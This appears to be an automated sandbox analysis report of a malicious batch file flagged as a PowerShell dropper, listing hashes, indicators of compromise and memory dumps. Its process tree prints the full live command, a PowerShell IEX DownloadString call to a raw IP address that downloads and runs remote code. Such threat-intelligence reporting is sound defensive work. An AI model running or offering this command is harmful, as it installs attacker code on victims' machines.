4df4f51379a5fdc56671e999a52ac96c8b4fd0194a2af6f602bc7fc20825ea1a

Analysis

Target

594f735f38e39066e0ea5392e1a93dba.bat
Size

219B
MD5

2dcb6e0063636fed2c26c0b88d389592
SHA1

001718f5ec05cecbdd87d1950fb13fa8e8b1c93f
SHA256

4df4f51379a5fdc56671e999a52ac96c8b4fd0194a2af6f602bc7fc20825ea1a
SHA512

a3157d8ad3f0a88b822774239cdfb1ea7e15fcd89b8061310656239ff64a0480f1ef9a8d70fee76e759de63cb31eeb29f175518776a93c7951f90228abdb4644

Score

10^/10

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/594f735f38e39066e0ea5392e1a93dba

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

cmd.exe

description	pid	process	target process
PID 3676 wrote to memory of 4044	3676	cmd.exe	powershell.exe
PID 3676 wrote to memory of 4044	3676	cmd.exe	powershell.exe
PID 3676 wrote to memory of 4044	3676	cmd.exe	powershell.exe

Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

3852 4044 WerFault.exe powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

WerFault.exe

description pid process

Token: SeRestorePrivilege 3852 WerFault.exe
Token: SeBackupPrivilege 3852 WerFault.exe
Token: SeDebugPrivilege 3852 WerFault.exe

pid	pid_target	process	target process
3852	4044	WerFault.exe	powershell.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

WerFault.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\594f735f38e39066e0ea5392e1a93dba.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3676

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/594f735f38e39066e0ea5392e1a93dba');Invoke-SWAGNDKFQZBV;Start-Sleep -s 10000"
2⤵
PID:4044

memory/3852-1-0x0000000004D00000-0x0000000004D01000-memory.dmp

Filesize
4KB

Download
memory/3852-8-0x0000000005430000-0x0000000005431000-memory.dmp

Filesize
4KB

Download
memory/4044-0-0x0000000000000000-mapping.dmp

Download
memory/4044-2-0x0000000000000000-mapping.dmp

Download
memory/4044-3-0x0000000000000000-mapping.dmp

Download
memory/4044-4-0x0000000000000000-mapping.dmp

Download
memory/4044-5-0x0000000000000000-mapping.dmp

Download
memory/4044-6-0x0000000000000000-mapping.dmp

Download
memory/4044-7-0x0000000000000000-mapping.dmp

Download